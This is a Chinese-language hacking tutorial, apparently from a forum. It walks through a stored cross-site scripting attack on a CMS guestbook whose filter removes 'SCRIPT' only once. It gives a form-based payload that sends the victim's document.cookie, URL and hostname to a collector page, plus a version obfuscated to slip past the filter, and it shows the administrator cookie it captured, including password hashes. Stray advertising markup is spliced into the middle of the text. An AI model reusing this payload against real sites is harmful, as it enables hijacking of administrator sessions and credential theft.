漏洞主要出现在“雁过留声(留言板)”、“信息管理”和“短消息”里,这里以留言板为例
下面我们来测试一下漏洞
打开留言板,选择源代码模式签写留言
审核发表状态下钓到管理员Cookies的几率比较到
我们先来试试一些文字
输入 未被过滤
输入 script 过滤成 ,不好意思 刚才弄错了
输入scrSCRIPTipt会过滤成script(去掉了中间的大写SCRIPT)
看 漏洞出来了
也就是说它会把"Script"字符过滤掉,但是只过滤一次,给了我们可乘之机
(iframe标签你可以自己测试)
下面是一个获得Cookies的代码,会把Cookies提交到http://localhost/cookies/cookies.asp,相关的代码我会打包到教程里
Copy code form name=redir action=http://localhost/cookies/cookie.asp method=post
cript redir.cookie.value=document.cookie;redir.url.value=location.href;redir.hostname.value=location.hostname;redir.submit(); /script [/code
现在我们在一些可能的敏感字符中插入SCRIPT字符,以防我们的代码被过滤
更改后的代码如下:
[code] FOSCRIPTRM naSCRIPTme=redSCRIPTir actSCRIPTion=http://locaSCRIPTlhost/cooSCRIPTkies/cooSCRIPTkie.asp
input type=hidSCRIPTden name=coSCRIPTokie
input type=hidSCRIPTden name=uSCRIPTrl
input type=hidSCRIPTden name=hoSCRIPTstname
/forSCRIPTm
crSCRIPTipt rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit(); /scrSCRIPTipt
现在我们发表留言
onmouseover='isShowAds = true;isShowAds2 = true;ads.Move(this,"","%u6700%u5F3A%u7684%u6570%u636E%u5E93%uFF01%u6765%u81EA%u5FAE%u8F6F","20656","数据库","%u6570%u636E%u5E93","http%3A//go.microsoft.com/%3Flinkid%3D6331217", event)' style="FONT-WEIGHT: normal; CURSOR: hand; COLOR: #0000ff; TEXT-DECORATION: underline" onclick='javascript:window.open("http://s2.17luntan.com/ClickPortal/WebClick.aspx?id=20656 k=%u6570%u636E%u5E93 siteid=10BAkFAAIDUQtQUgFcUwIDCgQEDVICCwRRVFAAB1YNUwE url=http%3A//www.hackeroo.com/read.php%3Ftid-3766.html gourl=http%3A//go.microsoft.com/%3Flinkid%3D6331217 parm=1F6E680A6D528025AA259D82E0BB8CE678A3A97C5A23885E alliedsiteid=6266");' onmouseout="isShowAds = false;isShowAds2 = false"> 里的代码是我们修改前的代码
现在以管理员身份登录
现在我们保存cookies的数据库是空的
这是我发送的钓Cookies的网页
好的,现在代码已经执行,管理员的Cookies已经被我们钓到了
我们来看一下
ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd UserName=admin AdminLoginCode=PowerEasy2006 AdminName=admin UserPassword=469e80d32c0559f8 RndPassword=4P263W7JiD425kyd AdminPassword=469e80d32c0559f8
怎么样?得到了吧?